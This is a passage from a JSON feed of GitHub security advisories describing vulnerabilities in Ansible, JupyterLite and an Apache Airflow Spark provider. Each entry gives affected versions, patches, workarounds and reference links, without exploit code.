href=\"https://github.com/advisories/GHSA-gwr8-5j83-483c\">https://github.com/advisories/GHSA-gwr8-5j83-483c</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c",
            "title": "[ansible] OS Command Injection and Improper Input Validation in ansible",
            "date_modified": "2024-09-06T20:14:43.000Z",
            "date_published": "2021-04-20T16:44:22.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in the solaris_zone module from the Ansible Community modules. When setting the name for the zone on the Solaris host, the zone name is checked by listing the process with the 'ps' bare command on the remote machine. An attacker could take advantage of this flaw by crafting the name of the zone and executing arbitrary commands in the remote host. Ansible Engine 2.7.15, 2.8.7, and 2.9.2 as well as previous versions are affected.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-14904\">https://nvd.nist.gov/vuln/detail/CVE-2019-14904</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/65686\">https://github.com/ansible/ansible/pull/65686</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1776944\">https://bugzilla.redhat.com/show_bug.cgi?id=1776944</a></li>\n<li><a href=\"https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html\">https://lists.debian.org/debian-lts-announce/2021/01/msg00023.html</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69\">https://github.com/ansible/ansible/commit/589a415f887b6f2bb65cd07fe6b2e9d0a8156b69</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907\">https://github.com/ansible/ansible/commit/6a86650109b8654f5898369e45d3857624edf907</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8\">https://github.com/ansible/ansible/commit/a1b0f72c98b4b2afaab8aafa255e82c2075049c8</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gwr8-5j83-483c\">https://github.com/advisories/GHSA-gwr8-5j83-483c</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-161.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c",
            "title": "[ansible] OS Command Injection and Improper Input Validation in ansible",
            "date_modified": "2024-09-06T20:14:43.000Z",
            "date_published": "2021-04-20T16:44:22.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gwr8-5j83-483c"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when <code>disable_gpg_check</code> is set to <code>False</code>, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-14365\">https://nvd.nist.gov/vuln/detail/CVE-2020-14365</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1869154\">https://bugzilla.redhat.com/show_bug.cgi?id=1869154</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e\">https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1d043e082b3b1f3ad35c803137f5d3bcbae92275\">https://github.com/ansible/ansible/commit/1d043e082b3b1f3ad35c803137f5d3bcbae92275</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1fa2d5fd6b768120b76a77929e27302b06accc0c\">https://github.com/ansible/ansible/commit/1fa2d5fd6b768120b76a77929e27302b06accc0c</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-m429-fhmv-c6q2\">https://github.com/advisories/GHSA-m429-fhmv-c6q2</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-209.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-209.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-m429-fhmv-c6q2",
            "title": "[ansible] Improper Verification of Cryptographic Signature in ansible",
            "date_modified": "2024-09-06T20:08:45.000Z",
            "date_published": "2021-04-20T16:44:07.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-m429-fhmv-c6q2"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when <code>disable_gpg_check</code> is set to <code>False</code>, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-14365\">https://nvd.nist.gov/vuln/detail/CVE-2020-14365</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1869154\">https://bugzilla.redhat.com/show_bug.cgi?id=1869154</a></li>\n<li><a href=\"https://www.debian.org/security/2021/dsa-4950\">https://www.debian.org/security/2021/dsa-4950</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e\">https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1d043e082b3b1f3ad35c803137f5d3bcbae92275\">https://github.com/ansible/ansible/commit/1d043e082b3b1f3ad35c803137f5d3bcbae92275</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/1fa2d5fd6b768120b76a77929e27302b06accc0c\">https://github.com/ansible/ansible/commit/1fa2d5fd6b768120b76a77929e27302b06accc0c</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-m429-fhmv-c6q2\">https://github.com/advisories/GHSA-m429-fhmv-c6q2</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-209.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-209.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-m429-fhmv-c6q2",
            "title": "[ansible] Improper Verification of Cryptographic Signature in ansible",
            "date_modified": "2024-09-06T20:08:45.000Z",
            "date_published": "2021-04-20T16:44:07.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-m429-fhmv-c6q2"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<h3 id=\"impact\">Impact</h3>\n<p>The vulnerability depends on user interaction by opening a malicious notebook with Markdown cells, or Markdown file using JupyterLab preview feature.</p>\n<p>A malicious user can access any data accessible from JupyterLite and perform arbitrary actions in JupyterLite environment.</p>\n<h3 id=\"patches\">Patches</h3>\n<p>JupyterLite 0.4.1 was patched.</p>\n<h3 id=\"workarounds\">Workarounds</h3>\n<p>There is no workaround for the underlying DOM Clobbering susceptibility. However, select plugins can be disabled on deployments which cannot update in a timely fashion to minimise the risk. These are:</p>\n<ul>\n<li><code>@jupyterlab/mathjax-extension:plugin</code> - users will loose ability to preview mathematical equations </li>\n<li><code>@jupyterlab/markdownviewer-extension:plugin</code> - users will loose ability to open Markdown previews</li>\n<li><code>@jupyterlab/mathjax2-extension:plugin</code> (if installed with optional <code>jupyterlab-mathjax2</code> package) - an older version of the mathjax plugin for JupyterLab 4.x</li>\n</ul>\n<p>To disable these extensions populate the <code>disabledExtensions</code> key in <code>jupyter-config-data</code> stanza of <code>jupyter-lite.json</code> as documented on <a href=\"https://jupyterlite.readthedocs.io/en/stable/howto/configure/config_files.html#jupyter-lite-json\">https://jupyterlite.readthedocs.io/en/stable/howto/configure/config_files.html#jupyter-lite-json</a></p>\n<pre><code class=\"language-json\">{\n  \"jupyter-lite-schema-version\": 0,\n  \"jupyter-config-data\": {\n    \"appName\": \"My JupyterLite App\",\n    \"disabledExtensions\": [\n      \"@jupyterlab/markdownviewer-extension:plugin\",\n      \"@jupyterlab/mathjax-extension:plugin\",\n      \"@jupyterlab/mathjax2-extension:plugin\"\n    ]\n  }\n}\n</code></pre>\n<p>To confirm that the plugins were disabled manual inspection of the built page is required.</p>\n<h3 id=\"references\">References</h3>\n<p>Upstream advisory: <a href=\"https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-9q39-rmj3-p4r2\">https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-9q39-rmj3-p4r2</a></p>\n<h3 id=\"notes\">Notes</h3>\n<p>This change has a potential to break rendering of some markdown. There is a setting in Sanitizer which allows to revert to the previous sanitizer settings (<code>allowNamedProperties</code>).</p>\n<h3 id=\"references-1\">References</h3>\n<ul>\n<li><a href=\"https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-9q39-rmj3-p4r2\">https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-9q39-rmj3-p4r2</a></li>\n<li><a href=\"https://github.com/jupyterlite/jupyterlite/security/advisories/GHSA-gj55-2xf9-67rq\">https://github.com/jupyterlite/jupyterlite/security/advisories/GHSA-gj55-2xf9-67rq</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-gj55-2xf9-67rq\">https://github.com/advisories/GHSA-gj55-2xf9-67rq</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-gj55-2xf9-67rq",
            "title": "[jupyterlite-core] HTML injection in JupyterLite leading to DOM Clobbering",
            "date_modified": "2024-09-06T19:51:20.000Z",
            "date_published": "2024-09-06T19:51:19.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-gj55-2xf9-67rq"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-1738\">https://nvd.nist.gov/vuln/detail/CVE-2020-1738</a></li>\n<li><a href=\"https://github.com/ansible/ansible/issues/67796\">https://github.com/ansible/ansible/issues/67796</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/67808\">https://github.com/ansible/ansible/pull/67808</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-f85h-23mf-2fwh\">https://github.com/advisories/GHSA-f85h-23mf-2fwh</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh",
            "title": "[ansible] Argument Injection in Ansible",
            "date_modified": "2024-09-06T18:18:15.000Z",
            "date_published": "2022-02-09T22:00:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-1738\">https://nvd.nist.gov/vuln/detail/CVE-2020-1738</a></li>\n<li><a href=\"https://github.com/ansible/ansible/issues/67796\">https://github.com/ansible/ansible/issues/67796</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/67808\">https://github.com/ansible/ansible/pull/67808</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-f85h-23mf-2fwh\">https://github.com/advisories/GHSA-f85h-23mf-2fwh</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh",
            "title": "[ansible] Argument Injection in Ansible",
            "date_modified": "2024-09-06T18:18:15.000Z",
            "date_published": "2022-02-09T22:00:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-1738\">https://nvd.nist.gov/vuln/detail/CVE-2020-1738</a></li>\n<li><a href=\"https://github.com/ansible/ansible/issues/67796\">https://github.com/ansible/ansible/issues/67796</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1738</a></li>\n<li><a href=\"https://security.gentoo.org/glsa/202006-11\">https://security.gentoo.org/glsa/202006-11</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/67808\">https://github.com/ansible/ansible/pull/67808</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-f85h-23mf-2fwh\">https://github.com/advisories/GHSA-f85h-23mf-2fwh</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2020-10.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh",
            "title": "[ansible] Argument Injection in Ansible",
            "date_modified": "2024-09-06T18:18:15.000Z",
            "date_published": "2022-02-09T22:00:04.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-f85h-23mf-2fwh"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Deserialization of Untrusted Data, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Software Foundation Apache Airflow Spark Provider.</p>\n<p>When the Apache Spark provider is installed on an Airflow deployment, an Airflow user that is authorized to configure Spark hooks can effectively run arbitrary code on the Airflow node by pointing it at a malicious Spark server. Prior to version 4.1.3, this was not called out in the documentation explicitly, so it is possible that administrators provided authorizations to configure Spark hooks without taking this into account. We recommend administrators to review their configurations to make sure the authorization to configure Spark hooks is only provided to fully trusted users.</p>\n<p>To view the warning in the docs please visit&nbsp; <a href=\"https://airflow.apache.org/docs/apache-airflow-providers-apache-spark/4.1.3/connections/spark.html\">https://airflow.apache.org/docs/apache-airflow-providers-apache-spark/4.1.3/connections/spark.html</a> </p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-40195\">https://nvd.nist.gov/vuln/detail/CVE-2023-40195</a></li>\n<li><a href=\"https://github.com/apache/airflow/pull/33233\">https://github.com/apache/airflow/pull/33233</a></li>\n<li><a href=\"https://lists.apache.org/thread/fzy95b1d6zv31j5wrx3znhzcscck2o24\">https://lists.apache.org/thread/fzy95b1d6zv31j5wrx3znhzcscck2o24</a></li>\n<li><a href=\"https://github.com/apache/airflow/commit/6850b5c777fa515e110ad1daa85242209a8ec6c0\">https://github.com/apache/airflow/commit/6850b5c777fa515e110ad1daa85242209a8ec6c0</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow-providers-apache-spark/PYSEC-2023-156.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow-providers-apache-spark/PYSEC-2023-156.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8q28-pw9g-w82c\">https://github.com/advisories/GHSA-8q28-pw9g-w82c</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8q28-pw9g-w82c",
            "title": "[apache-airflow-providers-apache-spark] Apache Airflow vulnerable arbitrary code execution via Spark server",
            "date_modified": "2024-09-06T18:08:32.000Z",
            "date_published": "2023-08-28T09:30:20.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8q28-pw9g-w82c"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Ansible fetch module before versions 2.5.15, 2.6.14, 2.7.8 has a path traversal vulnerability which allows copying and overwriting files outside of the specified destination in the local ansible controller host, by not restricting an absolute path.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-3828\">https://nvd.nist.gov/vuln/detail/CVE-2019-3828</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-74vq-h4q8-x6jv\">https://github.com/advisories/GHSA-74vq-h4q8-x6jv</a></li>\n<li><a href=\"https://github.com/ansible/ansible/pull/52133\">https://github.com/ansible/ansible/pull/52133</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2019:3744\">https://access.redhat.com/errata/RHSA-2019:3744</a></li>\n<li><a href=\"https://access.redhat.com/errata/RHSA-2019:3789\">https://access.redhat.com/errata/RHSA-2019:3789</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3828\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3828</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00021.html\">http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00021.html</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00077.html\">http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00077.html</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00020.html\">http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00020.html</a></li>\n<li><a href=\"http://packetstormsecurity.com/files/172837/Ansible-Fetch-Path-Traversal.html\">http://packetstormsecurity.com/files/172837/Ansible-Fetch-Path-Traversal.html</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/396a2f74717477d80600450e2b7e45349d7b5110\">https://github.com/ansible/ansible/commit/396a2f74717477d80600450e2b7e45349d7b5110</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/4be3215d2f9f84ca283895879f0c6ce1ed7dd333\">https://github.com/ansible/ansible/commit/4be3215d2f9f84ca283895879f0c6ce1ed7dd333</a></li>\n<li><a href=\"https://github.com/ansible/ansible/commit/f3edc091523fbe301926b7a0db25fbbd96940d93\">https://github.com/ansible/ansible/commit/f3edc091523fbe301926b7a0db25fbbd96940d93</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2019-5.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/ansible/PYSEC-2019-5.yaml</a></li>\n<li><a href=\"https://usn.ubuntu.com/4072-1\">https://usn.ubuntu.com/4072-1</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-74vq-h4q8-x6jv",
            "title": "[ansible] Ansible Path Traversal vulnerability",
            "date_modified": "2024-09-06T18:07:12.000Z",
            "date_published": "2019-04-15T16:19:19.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-74vq-h4q8-x6jv"
            },
            "tags": [
                "severity"
            ]
        }
    ]
}